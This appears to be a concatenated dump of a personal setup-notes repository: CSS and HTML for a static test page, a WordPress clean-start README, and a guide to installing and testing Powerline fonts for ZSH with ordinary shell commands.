}
section {
  max-width: 800px;
  margin-bottom: 20px;
  background: #fff;
  padding: 15px;
  border-radius: 8px;
  box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1);
}
section h2 {
  margin-top: 0;
  color: #6a11cb;
}
ul {
  padding-left: 20px;
}
footer {
  background: #333;
  color: #fff;
  padding: 10px;
  text-align: center;
}
footer p {
  margin: 0;
}
@media (min-width: 768px) {
  main {
    flex-direction: row;
    flex-wrap: wrap;
    justify-content: center;
  }
  section {
    flex: 0 0 45%;
    margin: 10px;
  }
}
-------------------------------------------------------------------------------- /Web/server/static-demo-website/index.html:
--------------------------------------------------------------------------------
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <title>Modern HTML Page</title>
  <link rel="stylesheet" href="css/style.css" />
</head>
<body>
  <header>
    <h1>Welcome to this testing Page</h1>
  </header>
  <main>
    <section>
      <h2>About</h2>
      <p>If you are here, then Congrats! You can host static websites!</p>
    </section>
    <section>
      <h2>Features</h2>
      <ul>
        <li>HTTP server is installed on your system</li>
        <li>HTTP server is up and running</li>
        <li>Your firewall rules provide access to the proper port</li>
        <li>You can fetch multiple files properly</li>
      </ul>
    </section>
  </main>
  <footer>
    <p>© 2025 Used for verification. Built with ❤️</p>
  </footer>
  <script src="js/function.js"></script>
</body>
</html>
-------------------------------------------------------------------------------- /Web/server/static-demo-website/js/function.js: --------------------------------------------------------------------------------
function showAlert() {
  alert("Button was clicked!");
}
-------------------------------------------------------------------------------- /Wordpress/README.md: --------------------------------------------------------------------------------
# WordPress

## WordPress Admin
`https://<your-site>/wp-admin`

## Clean start
1. Delete all posts
2. Delete all pages
3. (After installing the first theme) Delete all other themes, and enable auto-updates
4. Deactivate and uninstall the default plugins
5. `Dashboard` > `Screen options` > deactivate the auxiliary panels you don't need
6. `Settings`
   1. `General` > Set `Site Title`, `Tagline` and `Site Icon`
   2. `Permalinks` > Select `Post name`, then delete the trailing `/` in `Custom Structure` to keep URLs clean (important for sites with blog posts)

---

## Useful online tools
### Free content for commercial use, no attribution required
- [Pexels](https://www.pexels.com/)
- [Unsplash](https://unsplash.com/)
- [Pixabay](https://pixabay.com/)

### Converter
- [Freeconvert](https://www.freeconvert.com/)

---

## Themes
### Featured
- Astra

## Plugins
- `Starter templates`: Import ready-made starter sites (pairs well with Astra)
- `Elementor`: Page builder
- `Simply Static`: Convert a WP site to a static site

---

-------------------------------------------------------------------------------- /ZSH/fonts.md: --------------------------------------------------------------------------------
# FONTS

Many terminal themes, such as `agnoster`, recommend using patched Nerd Fonts like **MesloLGS NF** to properly render Powerline symbols and icons.

---

## Powerline Fonts

### Installation

#### Option 1: Install via APT (for Ubuntu/Debian)
```bash
sudo apt-get install fonts-powerline
```

#### Option 2: Manual Installation from GitHub
```bash
cd ~
git clone https://github.com/powerline/fonts.git --depth=1
cd fonts
./install.sh
cd ..
rm -rf fonts
```

---

### Verifying Installation

To confirm that Powerline fonts are installed:
```bash
fc-list | grep -i powerline
```

Expected output:
```bash
/usr/share/fonts/truetype/powerline-symbols/PowerlineSymbols.otf: PowerlineSymbols:style=Regular
```

---

### Configuring Terminal to Use Powerline-Compatible Fonts

1. Open your terminal's **Preferences**
2. Select your active **Profile**
3. Navigate to the **Text** or **Font** settings
4. Enable **Custom Font**
5. Choose a Nerd Font such as:
   - MesloLGS NF
   - Fira Code Nerd Font
   - Hack Nerd Font

Ensure the selected font supports Powerline symbols.

---

### Testing Font Rendering

Run the following to test Powerline glyph rendering:
```bash
echo "\uE0B0 \uE0B1 \uE0B2 \uE0B3 \uE0A0 \uE0A1 \uE0A2"
```

If configured correctly, this should display a series of special symbols. If you see boxes or question marks instead, the font is either missing or not active in your terminal.

--------------------------------------------------------------------------------
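
The same check can be scripted so each glyph is printed next to its codepoint, making it easy to spot exactly which symbols your font fails to render. A small sketch; the function name `powerline_glyphs` is just for illustration, and it assumes a `printf` that expands `\uXXXX` escapes (bash >= 4.2, or zsh):

```shell
# Print the core Powerline codepoints next to their glyphs, so you can
# see at a glance which ones your terminal font actually renders.
powerline_glyphs() {
  local cp
  for cp in E0A0 E0A1 E0A2 E0B0 E0B1 E0B2 E0B3; do
    # The shell expands ${cp} first, then printf interprets \uXXXX
    printf "U+%s  \u${cp}\n" "$cp"
  done
}

powerline_glyphs
```

A rendered glyph next to each `U+xxxx` label means that codepoint is covered; a box or question mark pinpoints the missing symbol.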